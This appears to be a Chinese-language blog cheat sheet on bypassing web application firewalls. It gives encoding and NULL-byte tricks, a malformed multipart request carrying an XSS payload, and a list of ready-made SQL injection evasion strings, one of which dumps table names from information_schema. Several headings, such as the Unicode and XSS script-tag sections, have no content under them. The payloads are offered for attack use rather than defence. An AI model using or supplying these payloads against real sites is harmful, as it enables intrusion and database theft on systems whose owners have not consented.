ByPass WAF-building

ByPass WAF

对一些攻击特征串进行不同的编码，如：URL编码，ASCII，Unicode.使用一些非标准的编码很容易就造成WAF BYPASS.

一些字符非标准的unicode码：

用NULL对数据截断，经测试发现，灵活使用NULL字节可以有效避开配置为阻止包含已知攻击字符串的请求的WAF。

有时，把使用GET方法的攻击转换成使用POST方法的攻击可能会避开某些过滤。许多应用程序在整个应用程序中执行某正常规过滤，阻止已知的攻击字
符串。如果一个应用程序希望收到使用GET方法的请求，它能之对URL查询字符串执行这种过滤。将请求转换为使用POST就可以完全避开这种过滤。

看一个在没有正确解析HTTP Request数据包导致的WAF绕过，触发一个XSS：

POST /demo.php HTTP/1.0
Content-Type: multipart/form-data; boundary=0000
Content-Length: 97 Content-Disposition: form-data; name=x’;filename=”‘;name=payload;” <script>alert(1)</script>

正常的HTTP应该是如下：

POST /demo.php HTTP/1.0
Content-Type: multipart/form-data; boundary=0000
Content-Length: 97
–0000–
Content-Disposition: form-data; name=”upfile”; filename=”payload”
<script>alert(1)</script>
–0000–

对比上面俩个HTTP头，给我们提供了WAF绕过的思路，修改攻击特征串或HTTP中的一细节，让WAF无法解析或者解析错误导致绕过。（许多WAF对无法解析的HTTP头，默认直接BYPASS）

罗列了一小部分的基本的绕过技巧

这些技巧不一定能成功绕过WAF，但在许多场合下，通过一些基本技巧组合的使用，能提高绕过WAF的成功率，甚至完全BYPASS。

Sql Injection Bypass

大小写变种：

UnIon/**/sElEcT/**/1,2,3/**/fRoM/**/Users–

使用注释：

如上。在MySql中使用类似如下攻击依然有效：

‘/**/UN/**/ION/**/SEL/**/ECT/**/1,2,3/**/FROM/table–

内联内容(MySql Only)：

/*!UnIoN*/SeLecT+1,2,3–
/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()–

嵌套表达式：

UNunionION+SEselectLECT+1,2,3–

编码：

2次URL编码：

%252f%252a*/union%252f%252a*/select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users–

ASCII:

“SELECT” ASCII Encode in databases.

MySql: char(83,69,76,69,67,84)

Oracle: chr(83)chr(69)chr(76)chr(69)chr(67)chr(84)

Ms-Sql: char(chr(83)+chr(69)+chr(76)+chr(69)+chr(67)+chr(84))

使用空字节：

%00′ union+select+1,2,3–

uni%0bon+se%0blect+1,2,3–

参数污染（ASP/ASP.NET）：

id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users

XSS Bypass：

脚本标签：

脚本伪协议：

标签名称：

对标签名陈稍做修改，可以避开仅仅阻止特定标签名陈的过滤：